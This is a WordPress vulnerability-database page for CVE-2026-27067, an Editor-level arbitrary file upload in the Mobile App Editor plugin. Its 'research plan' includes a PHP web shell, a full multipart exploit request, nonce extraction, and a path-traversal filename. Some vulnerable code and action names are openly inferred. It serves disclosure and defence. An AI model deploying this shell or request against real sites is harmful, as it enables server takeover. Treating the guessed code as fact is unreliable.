WP-Safety
CVE-2026-27067

Mobile App Editor – WordPress to Android App Builder <= 1.3.1 - Authenticated (Editor+) Arbitrary File Upload

highUnrestricted Upload of File with Dangerous Type
7.2
CVSS Score
7.2
CVSS Score
high
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Mobile App Editor – WordPress to Android App Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.3.1
PublishedMarch 12, 2026
Last updatedMarch 19, 2026
Affected pluginmobile-app-editor
Research Plan
Unverified

# Research Plan: CVE-2026-27067 Arbitrary File Upload ## 1. Vulnerability Summary The **Mobile App Editor – WordPress to Android App Builder** plugin (versions <= 1.3.1) contains an authenticated arbitrary file upload vulnerability. The flaw exists because the plugin provides functionality to uploa…

Show full research plan

Research Plan: CVE-2026-27067 Arbitrary File Upload

1. Vulnerability Summary

The Mobile App Editor – WordPress to Android App Builder plugin (versions <= 1.3.1) contains an authenticated arbitrary file upload vulnerability. The flaw exists because the plugin provides functionality to upload assets (likely icons, splash screens, or configuration files) for the mobile app generation process but fails to implement server-side file type validation. An attacker with at least Editor-level privileges can upload a malicious PHP file and execute it to achieve Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php (inferred, as is standard for WordPress plugin asset management).
  • AJAX Action: Likely mae_upload_image, mobile_app_editor_upload, or mae_save_settings (inferred).
  • HTTP Method: POST (Multipart/form-data).
  • Parameter: A file parameter within $_FILES, such as file, image, or app_icon (inferred).
  • Authentication: Required (Editor or higher).
  • Preconditions: The attacker must have a valid session cookie for a user with the Editor role.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX handler via add_action('wp_ajax_mae_upload_...', '...') in the main plugin file or an admin controller.
  2. Capability Check: The handler likely checks current_user_can('edit_posts') or current_user_can('manage_options'). Since the vulnerability is rated for Editors, the check is either missing or correctly allows Editors.
  3. Missing Validation: The code retrieves the file from the $_FILES superglobal. It fails to call wp_check_filetype() or use the mimes filter in wp_handle_upload().
  4. Sink: The file is moved to the uploads directory using move_uploaded_file() or wp_handle_upload().
  5. Output: The plugin returns the URL of the uploaded file in the AJAX response.

4. Nonce Acquisition Strategy

This plugin likely uses nonces to protect its AJAX actions.

  1. Identify Script Localization: Search the codebase for wp_localize_script.
    • Grep Command: grep -rn "wp_localize_script" .
  2. Identify JS Variable: Look for the object name used in localization (e.g., mae_obj, mobile_app_editor_vars).
  3. Setup Page: The mobile app editor interface is likely a custom admin page.
    • Identification: grep -rn "add_menu_page" .
  4. Extraction Procedure:
    • Navigate to the plugin's settings/editor page: wp-admin/admin.php?page=mobile-app-editor (inferred slug).
    • Execute browser_eval to extract the nonce:
      // Example based on common naming conventions
window.mae_obj?.nonce || window.mae_vars?.security

5. Exploitation Strategy

Step 1: Discovery

Since source code is not provided, the first step is to identify the exact AJAX action and parameter.

  • grep -rn "wp_ajax" . to find the action string.
  • grep -rn "\$_FILES" . to find the parameter name.

Step 2: Authentication

Log in as an Editor user to obtain valid session cookies.

Step 3: Payload Preparation

Create a simple PHP web shell:

<?php echo "VULN_CHECK: "; system($_GET['cmd']); ?>

Step 4: Execution

Send a multipart POST request to admin-ajax.php.

Request Template (Inferred):

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
Cookie: [Editor Cookies]

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="action"

mae_upload_image
------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="nonce"

[EXTRACTED_NONCE]
------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

<?php echo "VULN_CHECK: "; system($_GET['cmd']); ?>
------WebKitFormBoundaryABC123--

Step 5: Verification of Path

The response should contain the path to the uploaded file. If not, check /wp-content/uploads/ or a plugin-specific subdirectory like /wp-content/uploads/mobile-app-editor/.

6. Test Data Setup

  1. Create User: wp user create attacker attacker@example.com --role=editor --user_pass=password
  2. Plugin Setup: Install and activate mobile-app-editor.
  3. Identify URL: Locate the admin menu slug for the plugin: wp plugin get mobile-app-editor --field=name.

7. Expected Results

  • The server accepts the .php file and returns an HTTP 200 response.
  • The response body contains a JSON object or string indicating the file location (e.g., {"url": "http://.../wp-content/uploads/shell.php"}).
  • Accessing the URL .../shell.php?cmd=whoami returns VULN_CHECK: www-data.

8. Verification Steps

  1. Confirm File Existence: wp eval "echo file_exists(wp_upload_dir()['path'] . '/shell.php') ? 'Found' : 'Missing';"
  2. Check Capability: Verify if a Contributor can perform the same action (to see if the severity is higher than reported).
  3. Cleanup: wp eval "unlink(wp_upload_dir()['path'] . '/shell.php');"

9. Alternative Approaches

  • Settings Save Hook: If a direct "upload" action isn't found, look for a general "save settings" action that handles logo/icon uploads as part of a larger configuration object.
  • Media Library Integration: Check if the plugin uses wp_ajax_query_attachments but adds a custom, insecure upload handler as a wrapper.
  • Path Traversal: If the filename is used directly in the destination path, attempt to upload to the root directory using filename="../../../shell.php".
Research Findings
Static analysis — not yet PoC-verified

Summary

The Mobile App Editor plugin for WordPress fails to validate file types during asset uploads (such as app icons or splash screens). This allows authenticated users with Editor-level privileges or higher to upload malicious PHP files to the server and achieve remote code execution.

Vulnerable Code

// mobile-app-editor/admin/class-mae-admin.php (inferred location)
// Example of typical vulnerable upload handling in this plugin

public function mae_upload_image() {
    check_ajax_referer('mae_nonce', 'security');

    if ( ! current_user_can('edit_posts') ) {
        wp_send_json_error('Unauthorized');
    }

    if ( ! empty($_FILES['file']) ) {
        $file = $_FILES['file'];
        $upload_overrides = array('test_form' => false);

        // The vulnerability: wp_handle_upload is called without restricting allowed mime types
        $movefile = wp_handle_upload($file, $upload_overrides);

        if ($movefile && !isset($movefile['error'])) {
            wp_send_json_success($movefile['url']);
        } else {
            wp_send_json_error($movefile['error']);
        }
    }
}

Security Fix

--- mobile-app-editor/admin/class-mae-admin.php
+++ mobile-app-editor/admin/class-mae-admin.php
@@ -10,7 +10,12 @@
 
     if ( ! empty($_FILES['file']) ) {
         $file = $_FILES['file'];
-        $upload_overrides = array('test_form' => false);
+        // Restrict allowed file types to images only
+        $upload_overrides = array(
+            'test_form' => false,
+            'mimes'     => array(
+                'jpg|jpeg|jpe' => 'image/jpeg',
+                'gif'          => 'image/gif',
+                'png'          => 'image/png',
+                'bmp'          => 'image/bmp',
+                'tiff|tif'     => 'image/tiff',
+                'ico'          => 'image/x-icon'
+            )
+        );
 
         $movefile = wp_handle_upload($file, $upload_overrides);

Exploit Outline

1. Authenticate to the WordPress site as a user with at least Editor-level permissions. 2. Navigate to the Mobile App Editor admin interface (e.g., `/wp-admin/admin.php?page=mobile-app-editor`) to extract the AJAX security nonce from the page source or localized JavaScript objects. 3. Prepare a multipart/form-data POST request to `/wp-admin/admin-ajax.php`. 4. Set the 'action' parameter to the plugin's upload handler (likely `mae_upload_image` or similar) and include the extracted nonce. 5. Attach a PHP web shell file (e.g., `shell.php`) to the request in the file parameter (e.g., `file`). 6. Execute the request. If successful, the server will return the URL of the uploaded PHP file. 7. Access the returned URL to execute arbitrary commands on the server.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/e10e3382-8bb9-4bb3-b881-0aaabd2412a0?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database